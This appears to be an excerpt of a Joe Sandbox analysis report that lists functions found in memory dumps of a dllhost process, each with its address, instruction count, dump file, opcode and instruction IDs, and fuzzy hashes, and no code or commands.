Instruction ID: 868d664c7298b23386f757b1244d1d3b01894bf4eeb883df882bd59380e8e4aa
Opcode Fuzzy Hash: cfe075b3ab167a3702773160332efc0221a593e952f16ea217a303caf497ecc1
Instruction Fuzzy Hash: CA216B35F00224CBDB189BB4D8583AD36E2BF85351F4981A9E846EB3E0DB799C44CB51

Function 04BC5679 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa469cec2c8865e91601a0e7ac4c3cdd86507d7f413f604f3905b79a479e082d
Instruction ID: 2b1dff8ffd531379857fd35eca9336248e8245072826990a8705d215d82626d1
Opcode Fuzzy Hash: aa469cec2c8865e91601a0e7ac4c3cdd86507d7f413f604f3905b79a479e082d
Instruction Fuzzy Hash: 31219631E40118EBEF14EFB9D8806EEF7B6AF84200F04457BE90AE7150EE3079418BA1

Function 04BC29D7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cca1cc89d0cb18b31fcf59e5dc9c53a3e655e03ede37c52a2466360c0e20e0fc
Instruction ID: a03ff948dfb1c8038e3aa7826365f60746fadee7b44808dad6fd15c9a7b4b0ea
Opcode Fuzzy Hash: cca1cc89d0cb18b31fcf59e5dc9c53a3e655e03ede37c52a2466360c0e20e0fc
Instruction Fuzzy Hash: 2A217135F00710CBDB289BB598583AA36E1BB95751F0445FAD887DB3E0EE649C05CB52

Function 04BC2CA3 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fdc4080912ebc1b1dcc663f51e01c46ba267caa921bc0c5e50e88bf1fad4c49
Instruction ID: 16b5b0da600164a52022f4c8bc40d98d64e7215740fbc1b448e5721b4b10fc97
Opcode Fuzzy Hash: 2fdc4080912ebc1b1dcc663f51e01c46ba267caa921bc0c5e50e88bf1fad4c49
Instruction Fuzzy Hash: 4D219A38F00320CBDB189FB5E85836E76E2BB89311F1481B9D846E73A0EE74AC40CB51

Function 04BC2D6A Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 214a2b329ba56cc818693135a84bb678a5a4c7df29ead9e6f30805aaeed944ae
Instruction ID: eb740570d5f2a23d731558646fe7afb772c67d54c476adfbd454e54d929bf2dc
Opcode Fuzzy Hash: 214a2b329ba56cc818693135a84bb678a5a4c7df29ead9e6f30805aaeed944ae
Instruction Fuzzy Hash: 31214C35F007148BDB58ABB8D85836E36F6BB99751F0445B9E84AEB3E0DE649C00CB51

Function 04BC2E94 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9e4afc9c2c90169e620b14587b1031f0cb053536bb534123e5935963d0df5ab
Instruction ID: 52b025417ce1d6d9bc812139f950790945ec8798373c8485140e5ce0203793da
Opcode Fuzzy Hash: c9e4afc9c2c90169e620b14587b1031f0cb053536bb534123e5935963d0df5ab
Instruction Fuzzy Hash: DF217F34F40318CBDB185BB4D4583A936A2BB85350F0445F9D946EB3E4DE74AC01CB52

Function 04BC27E5 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84d4f29c0d7e2184fe995feb1c6898a408d19801a4dff2f74692e1a1b1d1695f
Instruction ID: 6fdbea48176d2b5e27840ba0ca7b57fd22898370685718b3a69babf19e0411a3
Opcode Fuzzy Hash: 84d4f29c0d7e2184fe995feb1c6898a408d19801a4dff2f74692e1a1b1d1695f
Instruction Fuzzy Hash: C1213B35F403208BEB186BB5E8583AE76E1BB59351F0445F9D946E73E0EEA96C00CB51

Function 0485F298 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d339c2d7c9b2f290df4d520cd4d1bd13119f4aac386fe6e548b8ff38f4f2b2a
Instruction ID: e69cfafb23d7168e6fb1afd6863a9da902514f1dd523cb293bd105c340eae3e2
Opcode Fuzzy Hash: 2d339c2d7c9b2f290df4d520cd4d1bd13119f4aac386fe6e548b8ff38f4f2b2a
Instruction Fuzzy Hash: D8210178A05249DBEB00EFB8E5082ADB7F1FF41708F504969DB06D7264EF74AA04DB52

Function 04BC2819 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b94c2947abc43d17147b6a63ca9a667e9ce8c371e98730626719026aeb8e3339
Instruction ID: 3040d467f758cc7b0b7d6973a3f685a6df61c098277af4533148d213c7eab282
Opcode Fuzzy Hash: b94c2947abc43d17147b6a63ca9a667e9ce8c371e98730626719026aeb8e3339
Instruction Fuzzy Hash: 69213E39F40320CBDB185BB5D8983AD36E5BB55351F0485B9E886E73E0DE685C44CB51

Function 04BC5648 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a821603f5ab70f805f4a109ea83f00df053acbd6ca5586641144554d6ccd001a
Instruction ID: ead9f00e186cded7e028c2ab243ef8f2b688518f66b350f51c14256898ed13c4
Opcode Fuzzy Hash: a821603f5ab70f805f4a109ea83f00df053acbd6ca5586641144554d6ccd001a
Instruction Fuzzy Hash: 0821DB31F40118EBEF14EFB8D8806EEB7A5AF44344F4445BBE90AE7150EE7079418B65

Function 0485F289 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 168dc44d9447711d8110add3e581f4883251b275f836bc0f93bbfb5ac7f90bfe
Instruction ID: 58fb49a283d33557c712ae8fb63aacd89c4b357d7b789223ad4c0f3bf49ca080
Opcode Fuzzy Hash: 168dc44d9447711d8110add3e581f4883251b275f836bc0f93bbfb5ac7f90bfe
Instruction Fuzzy Hash: 0B212F38A04249CFDB00EFB8E9192AD77F1FF41308F504969DA06D7265EF34AA04DB52

Function 0485E028 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac047e48e36a74689970ba52f8b6e3b100759bde99fa98b66a370c5306de69a3
Instruction ID: 1682d5e3ffd1bce56eb8872ada97c9362fb93da89fa905567f7a74abdf112170
Opcode Fuzzy Hash: ac047e48e36a74689970ba52f8b6e3b100759bde99fa98b66a370c5306de69a3
Instruction Fuzzy Hash: 3D112630B401258FDB159B68CC647FE7BE2AB89300F19057AD800EBBE1CEB59C458791

Function 04BC29A6 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 726a5e993fee909b9493bac74d4f508788fd1b0bd437694f2e50f60fe8160ddb
Instruction ID: 37e2b9f91e20fbe61dc914633e72ac7360005f0309539ebde7ab838b4140ca66
Opcode Fuzzy Hash: 726a5e993fee909b9493bac74d4f508788fd1b0bd437694f2e50f60fe8160ddb
Instruction Fuzzy Hash: 6F115935F00324CBEB186FB5D85C3AE36A6BB55351F0445B9E846E73E0EE689C00CB51

Function 04BC72B0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13e4f1af991e34ddf2996e5d566dcc5ebb98a60a69979b9d839f5a0b622d428f
Instruction ID: 9287d75704320bee0d06b100289ecaccfb0881799ceee93e50adf467111c382e
Opcode Fuzzy Hash: 13e4f1af991e34ddf2996e5d566dcc5ebb98a60a69979b9d839f5a0b622d428f
Instruction Fuzzy Hash: A1113D35B002444FDF04EB78D4945AEB7E6EBC9210F1444BED91AE7350EE309C068792

Function 04BC72C0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5867bcd06669c0236c42cf86933184c99c094430a0074a6f4b2fe17a141d292c
Instruction ID: 4d8b4e2a7e4e4cdf7c1a3372adfdaa1e7bb8007cf8232da32d1a93c5858933cf
Opcode Fuzzy Hash: 5867bcd06669c0236c42cf86933184c99c094430a0074a6f4b2fe17a141d292c
Instruction Fuzzy Hash: 7811AB35B001054BDF04EB78D4946AE76E5EBC9210F5404BDDD1AE7350EE71AD068BD6

Function 04BC67F5 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ca1307997a0c40427191d2ffef045ddb8cf3c678783123b1e129de0a60ae5ac
Instruction ID: ca28648a7b15b8c7737b482226488bbbf23e9d9001d48cea65a93309fb064aae
Opcode Fuzzy Hash: 2ca1307997a0c40427191d2ffef045ddb8cf3c678783123b1e129de0a60ae5ac
Instruction Fuzzy Hash: 7911DA71F45108AFCF01ABA4E994BEC7B72EB95310F0444BBF816A7291FA355805C711

Function 079D2474 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3882277995.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79d0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5389522c74ee86eaa792f472044d68c0ca8fce88a17e555b3977b1a2249d316c
Instruction ID: 6b2dc9cec4a542bd6151d5c92d64343fca5227b9a430c7d29df550349e1c535e
Opcode Fuzzy Hash: 5389522c74ee86eaa792f472044d68c0ca8fce88a17e555b3977b1a2249d316c
Instruction Fuzzy Hash: 4D11B7B5908341AFD340CF19D980A5BFBE4FB9C664F04896EF998D7311E235E9148FA2

Function 04BC293C Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b344808e3be05b3f764a5d9bfdb0668ce67826ac3c966c7af44bdc2f400c6a0
Instruction ID: 3e960c089e1748f69902cc6395140e262c963eb91b364f188986bc2b3912ec64
Opcode Fuzzy Hash: 5b344808e3be05b3f764a5d9bfdb0668ce67826ac3c966c7af44bdc2f400c6a0
Instruction Fuzzy Hash: 32115E34F00310CBDB18ABB5D86836D36E2BB95351F0445B9E947E73E4EE649C00CB51

Function 04BC2A06 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9460a85c5297467173384406c76c9d8796bc0b9831bfc45565d5ec4d3a526485
Instruction ID: c150d6dfb36b4a89d3720ea895e6938784f30713042fe32817052ada22344849
Opcode Fuzzy Hash: 9460a85c5297467173384406c76c9d8796bc0b9831bfc45565d5ec4d3a526485
Instruction Fuzzy Hash: B2111C35F00224CBDB189BB5D89836D36E2BB99361F0445B9E987E73A0DE749C41CB51

Function 00810AC4 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3863197176.0000000000810000.00000040.00000020.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_810000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cce038a1453909831d4d862d9f56daf354fc284ebc2bb9c679c7271f7af11af
Instruction ID: 6fe73c797c54cb5bc4b66fb17990c46eff04c43af8a2fdf7e1b6bcbec12ba636
Opcode Fuzzy Hash: 3cce038a1453909831d4d862d9f56daf354fc284ebc2bb9c679c7271f7af11af
Instruction Fuzzy Hash: D311E4302082849FD715CB10C980F66F799FF8871CF28C5ADE9499B692C7BBD893DA51

Function 04BC2C55 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96e056422afd070646f4007d5dba7e4490261d368c7832f462eee5c7985e1b66
Instruction ID: 9a69bd3dd559b92320d1a781da8ae40a83166e6c02c5aa05ad6882fe4fa5e5e8
Opcode Fuzzy Hash: 96e056422afd070646f4007d5dba7e4490261d368c7832f462eee5c7985e1b66
Instruction Fuzzy Hash: 66110734F403208BDB18AFB5D85C36E36A2BB59751F0445B9E846E73A0EE689C00CB51

Function 04BC592C Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28461558700d691dcb575e1bf71d201988e85a1b53fe059b547d92dd59066822
Instruction ID: 41dcc45dbc3e39e3e14a58041e3225173a85990b2e06d420bace50f8ddb362e3
Opcode Fuzzy Hash: 28461558700d691dcb575e1bf71d201988e85a1b53fe059b547d92dd59066822
Instruction Fuzzy Hash: 27116035E000249BDB24DBA8C5C85DCF3B5FF68364F5585EAC956A7210E7B1BC41CB60

Function 04BC2A32 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77c15038d0432e711683cdf55db1a551a2530016ace0e9eed0de5bf1f11a3d04
Instruction ID: f8731be5ec6daeea4dd8573184cdf8e552926d2ca95b655845991d0d6e125f8a
Opcode Fuzzy Hash: 77c15038d0432e711683cdf55db1a551a2530016ace0e9eed0de5bf1f11a3d04
Instruction Fuzzy Hash: 6E111935F403248BEB186FB5D85C3AE36A2BB59751F0445B9E846E73E0EE689C00CB61

Function 04BC2B59 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cec766206f912a8e576ed27fb606ff75686f5c75bb9c14c1c7d4177feb1062f9
Instruction ID: a6a620993bc8c7102d9be183366bb1df86c76cddcb73fbc44549e239c425823f
Opcode Fuzzy Hash: cec766206f912a8e576ed27fb606ff75686f5c75bb9c14c1c7d4177feb1062f9
Instruction Fuzzy Hash: 58116D35F103208BDB586BB4D85836E36E2BB99751F4445B9E847EB3E0EE789C00CB52

Function 04BC46A8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f93b10b39d9f4cb3c55cffb7b7458e867e87c7e8449660613644a3980f96cd44
Instruction ID: b556aed7e87213225ee0d00f18209d680c47a7f2805fa08fc36ba7d40a028780
Opcode Fuzzy Hash: f93b10b39d9f4cb3c55cffb7b7458e867e87c7e8449660613644a3980f96cd44
Instruction Fuzzy Hash: 6B118C79F002448FCB04EBB8E8985EEBBF6AB89210B104579D51AE73A1EA745C018F91

Function 04BC2FE5 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6bb876874f075295d268a8a0d0c3d50a3db45e531a4f43f00ae89862ce022d9
Instruction ID: d6d787b2bfeb295ac89f917c73e8861e8502b3647ddefdbe50ebefb9c22d9693
Opcode Fuzzy Hash: c6bb876874f075295d268a8a0d0c3d50a3db45e531a4f43f00ae89862ce022d9
Instruction Fuzzy Hash: 72115B35F003208BDB18AFB5D85C36A36E1BB59351F0445B9E846E73E0EE689C00CB51

Function 0485E0E7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6993c9dca66691b07431f4bdc43a08d46b59d3b80e5c78342e7c38471b760822
Instruction ID: 649ec197e655839b7210bba4c546d15004bf45d32269aefdb0c65a99d4b37680
Opcode Fuzzy Hash: 6993c9dca66691b07431f4bdc43a08d46b59d3b80e5c78342e7c38471b760822
Instruction Fuzzy Hash: ED115B3054D3999FC31297688C147AD7FB1AF87200F0D45E7D840DB6E3CA285D0AC7A1

Function 04BC24D0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 209dc4b77f9d79378f69baae0c82a48a4147989e570f53f2d91d930933df2c5d
Instruction ID: c0336e3b8d1349a46a6aba4445fa8aee0b1f880164e5ed6e0d53d884c0ae204a
Opcode Fuzzy Hash: 209dc4b77f9d79378f69baae0c82a48a4147989e570f53f2d91d930933df2c5d
Instruction Fuzzy Hash: DC110438B042618BC7096B28E85435A3760BB46314F4640FAE546CB3A6DB29DC468BD6

Function 04BC2C43 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 823c0f10326d1da8d0dfd2a9e4873c70da7286f292fee835c30c7aa5410e93b8
Instruction ID: fda03d909cef637df0f1c4e88a9090940b7f20d812b9696572d88be1be810d21
Opcode Fuzzy Hash: 823c0f10326d1da8d0dfd2a9e4873c70da7286f292fee835c30c7aa5410e93b8
Instruction Fuzzy Hash: 3F117034F003208BDB586BB5986C36A36E1BB5A351F0445B9D887E73E0EE689C00C751

Function 04BC2B77 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73547dc0fd4d3003622962b498802a07b0ea91b725de5c8b03107c54085dbd76
Instruction ID: 35a3a45ea757940b5245dbed34e992dd44b712aee971866cc51e7dffaa636a41
Opcode Fuzzy Hash: 73547dc0fd4d3003622962b498802a07b0ea91b725de5c8b03107c54085dbd76
Instruction Fuzzy Hash: F3114F34F103248BDB18ABB4D85C36D36E2BB59751F0445B9E847E73E0EE649C00CB51

Function 0485F0E0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f8dd9721882317e4372cbe9c0ca3042b5fdbe1a65f18e644455fce85f28ec38
Instruction ID: 2dcdcc495545c8d74eccc4afe415b31cf75031708ccee8eea7a598be3d3b61a3
Opcode Fuzzy Hash: 6f8dd9721882317e4372cbe9c0ca3042b5fdbe1a65f18e644455fce85f28ec38
Instruction Fuzzy Hash: 3811C439A48255CBD705BB64E80835D3721FB42329F158A7ACF0ACB3A5EF349C46C796

Function 04BC2C24 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db10f0fb3787c04538c65faeb93b86642a95e349ad57e83a6d5443ca19f58c8
Instruction ID: 899f33fac6715b64d9a3d0e64395492e818f6104558fbc89da092da9f9626a77
Opcode Fuzzy Hash: 2db10f0fb3787c04538c65faeb93b86642a95e349ad57e83a6d5443ca19f58c8
Instruction Fuzzy Hash: 56114C35F003208BDB58ABB5D85836936E2BB59351F0445B9E947E73E4EE689C00CB51

Function 04BC2859 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 794f81918d667b9638cae734e4243676c9387fb88fdf073010d4744cb210026d
Instruction ID: e8005d3badc50ab98bee0fa199dcc5a18955d798be421a5131f080ecba5d071b
Opcode Fuzzy Hash: 794f81918d667b9638cae734e4243676c9387fb88fdf073010d4744cb210026d
Instruction Fuzzy Hash: 3C113C35F403208BDB186BB5D86C36A36E2BB5A751F4445B9E987E73E0EE689C00CB51

Function 04BC2A25 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc5f680ba3996303cc8a5662a6daac35311eb11db086808e08c30ba2dc924510
Instruction ID: 838f7de4e32e63ce0c3d6b187e9445d354a78e92b51fceed99f2ab9eb77f3d0a
Opcode Fuzzy Hash: cc5f680ba3996303cc8a5662a6daac35311eb11db086808e08c30ba2dc924510
Instruction Fuzzy Hash: 6C111C35F403208BDB18ABB5D8583A936E2BB99751F0445B9E987E73E0EE649C01CB51

Function 04BC2BE4 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7059233864fec7b294ee7c979436f3fb97b829ec0c44c78d9887e9262509ea4a
Instruction ID: 76505dc726a36c6b30fb82cf8a61492dac8940e211d809c80d03c8560cd07c73
Opcode Fuzzy Hash: 7059233864fec7b294ee7c979436f3fb97b829ec0c44c78d9887e9262509ea4a
Instruction Fuzzy Hash: 81114C35F003208BDB18ABB5985836A36E2BB99351F0445B9D947E73E0EE749C01CB51

Function 04BC2F04 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98f9c72fde5c4666f72fc903b649edd97450d21ce1cfdf1ce1347e6858897e16
Instruction ID: a6974c61e91603e2ee3fc9de96f056b529b29eed6aa95adc98c43688a603f999
Opcode Fuzzy Hash: 98f9c72fde5c4666f72fc903b649edd97450d21ce1cfdf1ce1347e6858897e16
Instruction Fuzzy Hash: 56114C34F003248BDB186BB5D85C36936E1BB55761F0445B9E987E73E0EE689C00CB51

Function 04BC2B4C Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f08160d9450c47ab0a387dde301bed84b0754dfe9d5617b7bffa18add1300189
Instruction ID: 0e0e0978f466ac420753556abb3356f33d93aabb07084589908433a521120f9c
Opcode Fuzzy Hash: f08160d9450c47ab0a387dde301bed84b0754dfe9d5617b7bffa18add1300189
Instruction Fuzzy Hash: 2B114C34F003208BDB18ABB4D8583AD36E1BB59351F0445B9E847E73E0EE689C00CB51

Function 04BC2878 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38c1874ea6b20fe79ec62e90f55bfb27c9913c7249c280b74f6ac2b373e06989
Instruction ID: 9035f22c69865ceb9e98e87685ccf878c75b97826f6711645ec5dec769aafcb2
Opcode Fuzzy Hash: 38c1874ea6b20fe79ec62e90f55bfb27c9913c7249c280b74f6ac2b373e06989
Instruction Fuzzy Hash: FC110635F403208BEB186BB5E85836A36A2BB59651F0445B9E986E73E0EE689C00CB51

